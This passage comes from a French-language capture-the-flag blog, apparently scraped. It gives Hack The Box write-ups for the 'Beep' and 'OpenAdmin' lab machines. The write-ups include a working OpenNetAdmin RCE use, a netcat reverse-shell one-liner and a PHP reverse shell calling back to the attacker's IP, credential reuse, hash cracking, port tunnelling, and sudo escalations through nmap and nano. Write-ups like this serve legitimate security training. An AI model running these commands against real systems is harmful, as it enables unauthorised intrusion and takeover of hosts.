http://www.insecure.org/nmap/ ) # Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help # nmap\u0026gt; !sh # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Privilege Escalation nmap as root Sur : https://gtfobins.github.io/gtfobins/nmap/\nOn trouve comment exploiter les droits root sur la commande nmap pour obtenir un shell privilégié.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 sudo -l Matching Defaults entries for asterisk on this host: env_reset, env_keep=\u0026#34;COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\u0026#34; User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper sudo /usr/bin/nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !sh whoami root cat /root/root.txt 19d01.....0b5f cat /home/*/user.txt c3a2.....2248 ","date":"2025-01-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/beep-htb/","title":"HTB | Beep"},{"content":" Machine name OS IP Difficulty OpenAdmin Linux 10.10.10.171 Easy Users 1 jimmy:n1nj4W4rri0R! Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nmap -sS -sC -sV -An -p22,80 -vvv 10.10.10.171 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE= | 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) Foothold dirsearch : openadmin.htb 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $ dirsearch -u http://openadmin.htb /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali/htb/OpenAdmin/reports/http_openadmin.htb/_25-01-13_17-16-56.txt Target: http://openadmin.htb/ [17:16:57] Starting: [17:16:58] 403 - 278B - /.ht_wsr.txt [17:16:58] 403 - 278B - /.htaccess.bak1 [17:16:58] 403 - 278B - /.htaccess.orig [17:16:58] 403 - 278B - /.htaccess.save [17:16:58] 403 - 278B - /.htaccess.sample [17:16:58] 403 - 278B - /.htaccess_extra [17:16:58] 403 - 278B - /.htaccess_sc [17:16:58] 403 - 278B - /.htaccessBAK [17:16:58] 403 - 278B - /.htaccess_orig [17:16:58] 403 - 278B - /.htaccessOLD [17:16:58] 403 - 278B - /.htaccessOLD2 [17:16:58] 403 - 278B - /.htm [17:16:58] 403 - 278B - /.html [17:16:58] 403 - 278B - /.htpasswd_test [17:16:58] 403 - 278B - /.htpasswds [17:16:58] 403 - 278B - /.httr-oauth [17:16:59] 403 - 278B - /.php [17:17:24] 301 - 314B - /music -\u0026gt; http://openadmin.htb/music/ [17:17:26] 301 - 312B - /ona -\u0026gt; http://openadmin.htb/ona/ \u0026lt;-------------------------- [17:17:32] 403 - 278B - /server-status [17:17:32] 403 - 278B - /server-status/ Task Completed ona - Open Net Admin http://openadmin.htb/ona/\n\u0026ldquo;You are NOT on the latest release version Your version = v18.1.1\u0026rdquo;\n1 2 3 4 5 6 7 8 9 10 $ searchsploit open net admin ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh SCO OpenServer 5.0.6 - lpadmin Buffer Overflow | sco/dos/20735.txt ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Voici un exploit python fonctionnel trouvé sur github: https://github.com/amriunix/ona-rce\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 python3 ona_exploit.py exploit http://openadmin.htb/ona ... sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u0026gt;\u0026amp;1|nc 10.10.16.2 1337 \u0026gt;/tmp/f --------------------------------------------------- $ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.171] 45688 sh: 0: can\u0026#39;t access tty; job control turned off $ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; www-data@openadmin:/opt/ona/www$ export TERM=xterm export TERM=xterm www-data@openadmin:/opt/ona/www$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 www-data@openadmin:/opt/ona/www$ whoami www-data mysql 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 www-data@openadmin:/opt/ona/www$ grep -ri \u0026#34;passwd\u0026#34; plugins/ona_nmap_scans/install.php: mysql -u {$self[\u0026#39;db_login\u0026#39;]} -p{$self[\u0026#39;db_passwd\u0026#39;]} {$self[\u0026#39;db_database\u0026#39;]} \u0026lt; {$sqlfile}\u0026lt;/font\u0026gt;\u0026lt;br\u0026gt;\u0026lt;br\u0026gt; include/functions_db.inc.php: $ona_contexts[$context_name][\u0026#39;databases\u0026#39;][\u0026#39;0\u0026#39;][\u0026#39;db_passwd\u0026#39;] = $db_context[$type] [$context_name] [\u0026#39;primary\u0026#39;] [\u0026#39;db_passwd\u0026#39;]; include/functions_db.inc.php: $ona_contexts[$context_name][\u0026#39;databases\u0026#39;][\u0026#39;1\u0026#39;][\u0026#39;db_passwd\u0026#39;] = $db_context[$type] [$context_name] [\u0026#39;secondary\u0026#39;] [\u0026#39;db_passwd\u0026#39;]; include/functions_db.inc.php: $ok1 = $object-\u0026gt;PConnect($self[\u0026#39;db_host\u0026#39;], $self[\u0026#39;db_login\u0026#39;], $db[\u0026#39;db_passwd\u0026#39;], $self[\u0026#39;db_database\u0026#39;]); .htaccess.example:# You will need to create an .htpasswd file that conforms to the standard .htaccess.example:# htaccess format, read the man page for htpasswd. Change the .htaccess.example:# AuthUserFile option below as needed to reference your .htpasswd file. .htaccess.example:# names, however, do need to be the same in both the .htpasswd and web .htaccess.example: #AuthUserFile /opt/ona/www/.htpasswd =========================== local/config/database_settings.inc.php: \u0026#39;db_passwd\u0026#39; =\u0026gt; \u0026#39;n1nj4W4rri0R!\u0026#39;, =========================== winc/user_edit.inc.php: name=\u0026#34;passwd\u0026#34; winc/user_edit.inc.php: if (!$form[\u0026#39;id\u0026#39;] and !$form[\u0026#39;passwd\u0026#39;]) { winc/user_edit.inc.php: if ($form[\u0026#39;passwd\u0026#39;]) { winc/user_edit.inc.php: $form[\u0026#39;passwd\u0026#39;] = md5($form[\u0026#39;passwd\u0026#39;]); winc/user_edit.inc.php: \u0026#39;passwd\u0026#39; =\u0026gt; $form[\u0026#39;passwd\u0026#39;], winc/user_edit.inc.php: if (strlen($form[\u0026#39;passwd\u0026#39;]) \u0026lt; 32) { winc/user_edit.inc.php: $form[\u0026#39;passwd\u0026#39;] = $record[\u0026#39;passwd\u0026#39;]; winc/user_edit.inc.php: \u0026#39;passwd\u0026#39; =\u0026gt; $form[\u0026#39;passwd\u0026#39;], winc/tooltips.inc.php:// Builds HTML for changing tacacs enable passwd $ cat database_settings.inc.php \u0026lt;?php $ona_contexts=array ( \u0026#39;DEFAULT\u0026#39; =\u0026gt; array ( \u0026#39;databases\u0026#39; =\u0026gt; array ( 0 =\u0026gt; array ( \u0026#39;db_type\u0026#39; =\u0026gt; \u0026#39;mysqli\u0026#39;, \u0026#39;db_host\u0026#39; =\u0026gt; \u0026#39;localhost\u0026#39;, \u0026#39;db_login\u0026#39; =\u0026gt; \u0026#39;ona_sys\u0026#39;, \u0026#39;db_passwd\u0026#39; =\u0026gt; \u0026#39;n1nj4W4rri0R!\u0026#39;, \u0026#39;db_database\u0026#39; =\u0026gt; \u0026#39;ona_default\u0026#39;, \u0026#39;db_debug\u0026#39; =\u0026gt; false, ), ), \u0026#39;description\u0026#39; =\u0026gt; \u0026#39;Default data context\u0026#39;, \u0026#39;context_color\u0026#39; =\u0026gt; \u0026#39;#D3DBFF\u0026#39;, ), ); On ne trouve rien d\u0026rsquo;intéressant dans la base de donnée mysql, cependant, le mot de passe fonctionne pour se connecter à l\u0026rsquo;utilisateur jimmy:\njimmy:n1nj4W4rri0R!\n1 2 3 4 www-data@openadmin:/opt/ona/www$ su jimmy Password: jimmy@openadmin:/opt/ona/www$ whoami jimmy On peut aussi se connecter en ssh :\n1 2 3 4 5 6 7 8 9 10 11 $ ssh jimmy@openadmin.htb The authenticity of host \u0026#39;openadmin.htb (10.10.10.171)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;openadmin.htb\u0026#39; (ED25519) to the list of known hosts. jimmy@openadmin.htb\u0026#39;s password: Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3 jimmy@openadmin:~$ whoami jimmy jimmy -\u0026gt; joanna internal : apache service On trouve un dossier \u0026ldquo;internal\u0026rdquo; avec du code php indiquant un autre serveur apache. Il s\u0026rsquo;agit d\u0026rsquo;une page de connexion avec un user \u0026ldquo;jimmy\u0026rdquo; et le hash de son mot de passe :\n1 2 3 ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal) index.php:\n1 2 3 4 5 6 7 8 9 10 if (isset($_POST[\u0026#39;login\u0026#39;]) \u0026amp;\u0026amp; !empty($_POST[\u0026#39;username\u0026#39;]) \u0026amp;\u0026amp; !empty($_POST[\u0026#39;password\u0026#39;])) { if ($_POST[\u0026#39;username\u0026#39;] == \u0026#39;jimmy\u0026#39; \u0026amp;\u0026amp; hash(\u0026#39;sha512\u0026#39;,$_POST[\u0026#39;password\u0026#39;]) == \u0026#39;00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1\u0026#39;) { $_SESSION[\u0026#39;username\u0026#39;] = \u0026#39;jimmy\u0026#39;; header(\u0026#34;Location: /main.php\u0026#34;); } else { $msg = \u0026#39;Wrong username or password.\u0026#39;; } } ?\u0026gt; Dans crackstation, on trouve le mot de passe du hash : \u0026lsquo;Revealed\u0026rsquo;. On observe que si on se connecte avec jimmy:Revealed, on se retrouve sur la page main qui semble afficher la clé SSH de l\u0026rsquo;utilisatrice \u0026ldquo;joanna\u0026rdquo;.\nmain.php:\n1 2 3 4 5 6 7 8 9 10 11 jimmy@openadmin:/var/www/internal$ cat main.php \u0026lt;?php session_start(); if (!isset ($_SESSION[\u0026#39;username\u0026#39;])) { header(\u0026#34;Location: /index.php\u0026#34;); }; ## Open Admin Trusted ## OpenAdmin $output = shell_exec(\u0026#39;cat /home/joanna/.ssh/id_rsa\u0026#39;); echo \u0026#34;\u0026lt;pre\u0026gt;$output\u0026lt;/pre\u0026gt;\u0026#34;; ?\u0026gt; \u0026lt;html\u0026gt; \u0026lt;h3\u0026gt;Don\u0026#39;t forget your \u0026#34;ninja\u0026#34; password\u0026lt;/h3\u0026gt; Click here to logout \u0026lt;a href=\u0026#34;logout.php\u0026#34; tite = \u0026#34;Logout\u0026#34;\u0026gt;Session \u0026lt;/html\u0026gt; On voit les configurations de ce deuxieme serveur apache:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jimmy@openadmin:/tmp$ cat /etc/apache2/sites-enabled/internal.conf Listen 127.0.0.1:52846 \u0026lt;VirtualHost 127.0.0.1:52846\u0026gt; ServerName internal.openadmin.htb DocumentRoot /var/www/internal \u0026lt;IfModule mpm_itk_module\u0026gt; AssignUserID joanna joanna \u0026lt;/IfModule\u0026gt; ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined \u0026lt;/VirtualHost\u0026gt; Il tourne donc sur le port 52846. On peut aussi observer que ce port est bien ouvert avec la commande \u0026ldquo;ss\u0026rdquo; :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ ss -nlta State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* LISTEN 0 128 127.0.0.1:52846 0.0.0.0:* CLOSE-WAIT 0 0 10.10.10.171:35776 10.10.16.2:1337 CLOSE-WAIT 0 0 10.10.10.171:36134 10.10.16.2:1337 SYN-SENT 0 1 10.10.10.171:55916 1.1.1.1:53 ESTAB 0 36 10.10.10.171:22 10.10.16.2:36932 CLOSE-WAIT 0 0 10.10.10.171:35848 10.10.16.2:1337 ESTAB 0 0 10.10.10.171:22 10.10.16.2:44542 ESTAB 0 0 10.10.10.171:36824 10.10.16.2:1337 LISTEN 0 128 [::]:22 [::]:* LISTEN 0 128 *:80 *:* CLOSE-WAIT 1 0 [::ffff:10.10.10.171]:80 [::ffff:10.10.16.2]:58916 CLOSE-WAIT 1 0 [::ffff:10.10.10.171]:80 [::ffff:10.10.16.2]:49868 CLOSE-WAIT 1 0 [::ffff:10.10.10.171]:80 [::ffff:10.10.16.2]:37876 CLOSE-WAIT 1 0 [::ffff:10.10.10.171]:80 [::ffff:10.10.16.2]:38320 Pour accéder à ce serveur apache, on doit rediriger le port 52846 en local. On peut faire ca très facilement à l\u0026rsquo;aide \u0026ldquo;chisel\u0026rdquo; pour faire du port forwarding :\n1 2 3 4 5 6 7 8 9 10 11 jimmy@openadmin:/tmp$ ./chiselserver_linux client 10.10.16.2:8081 R:52846:127.0.0.1:52846 2025/01/20 10:10:38 client: Connecting to ws://10.10.16.2:8080 2025/01/20 10:10:38 client: Connected (Latency 34.737115ms) ---------------------------------------------------- $ ./chiselserver_linux server -p 8081 --reverse 2025/01/20 05:09:33 server: Reverse tunnelling enabled 2025/01/20 05:09:33 server: Fingerprint 1ytgJA0Yrt37Nd/YOVUXpE2VjZp29m7JvW5jTyjZ9D4= 2025/01/20 05:09:33 server: Listening on http://0.0.0.0:8080 2025/01/20 05:10:03 server: session#1: tun: proxy#R:52846=\u0026gt;52846: Listening Depuis notre kali, on accéde à la page puis (apres connexion jimmy:Revealed) on obtient: http://localhost:52846/main.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE 6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI 9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ /U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH 40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb 9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr 1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM +4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN -----END RSA PRIVATE KEY----- Don\u0026#39;t forget your \u0026#34;ninja\u0026#34; password Click here to logout Session On peut modifier le fichier main.php avec jimmy pour ouvrir un reverse shell avec le user joanna :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 ## On utilise un script \u0026#34;php-reverse-shell.php pour ouvrir un reverse shell ## on le place dans le dossier internal, puis on l\u0026#39;execute depuis le navigateur: ## http://localhost:52846/php-reverse-shell.php ... // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;10.10.16.2\u0026#39;; // CHANGE THIS $port = 1338; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // ... -------------------------------------- ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ nc -lnvp 1338 listening on [any] 1338 ... connect to [10.10.16.2] from (UNKNOWN) [10.10.10.171] 60408 Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 10:51:59 up 6 min, 1 user, load average: 0.00, 0.10, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT jimmy pts/0 10.10.16.2 10:48 15.00s 0.08s 0.07s -bash uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; joanna@openadmin:/$ export TERM=xterm export TERM=xterm joanna@openadmin:/$ ^Z zsh: suspended nc -lnvp 1338 ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1338 joanna@openadmin:/$ joanna@openadmin:/$ whoami joanna joanna@openadmin:/$ cd /home/joanna/ joanna@openadmin:/home/joanna$ ls user.txt joanna@openadmin:/home/joanna$ cat user.txt 11dc.....75aa SSH : joanna 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ ssh-keygen -t rsa -b 2048 -f joanna_key Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in joanna_key Your public key has been saved in joanna_key.pub The key fingerprint is: SHA256:w3+Bf3zBE44h5De2+Y3MmwMIZVTWG2HoIJYslnAWVDU kali@kali The key\u0026#39;s randomart image is: +---[RSA 2048]----+ | .o==.+Eoooo. | | o+ = *o..o | | . o + = = + | | .. .= X .| | S....+ = | | o...=..+| | . o.*.o| | . ..+ | | o. | +----[SHA256]-----+ ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ cat joanna_key.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDS5cj9VZMFNS/Ga0vlT44cnx1HTDMQo3WpDw94nizBdQBMKYk5XmaKFMZdKxeGKNIEERpbKGObTXwbDix9JYY9aA1M4/l/tOSY97w3kMXlRrwJppGIedXyDmAsPjIjQUpFQ00ZPEClME0OQXDzQHxDtkFm6kvefiiI5jLt0+aqvWqkPjbpOlBnm60PuxYsSrPLIUjvw6JUt/ckece553L+BPzwO6HfLuk3wH6i9CGocS90CIu1M00vrkTi3CJVTcCowx8u81bQmM3b/NMksEDC38Xf4gL1ZA4QI5zVqIptxQPuOkBJWFmgkPrzE6Fniod0VGHIn/WMBdJAc/XAhpu/ kali@kali ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ ssh -i joanna_key joanna@openadmin.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Jan 20 10:59:11 UTC 2025 System load: 0.0 Processes: 178 Usage of /: 31.1% of 7.81GB Users logged in: 1 Memory usage: 9% IP address for ens160: 10.10.10.171 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 39 packages can be updated. 11 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15 joanna@openadmin:~$ On place dans authorized_key de joanna, et on peut ssh sans soucis\u0026hellip;\njoanna -\u0026gt; root Enumeration 1 2 3 4 5 6 7 joanna@openadmin:~$ sudo -l Matching Defaults entries for joanna on openadmin: env_keep+=\u0026#34;LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET\u0026#34;, env_keep+=\u0026#34;XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH\u0026#34;, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, mail_badpass User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv nano as root https://gtfobins.github.io/gtfobins/nano/\nSur gtfobins, on cherche comment elever ses privilèges à l\u0026rsquo;aide de nano. On trouve la commande suivante :\n1 2 3 nano ^R^X reset; sh 1\u0026gt;\u0026amp;0 2\u0026gt;\u0026amp;0 On obtient ensuite un shell en tant que root :\n1 2 3 4 5 ## whoami root ## cd /root ## cat root.txt ????????????? BONUS: ssh2john et john pour cracker le mot de passe de joanna 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ ssh2john old_joanna.pem old_joanna.pem:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46b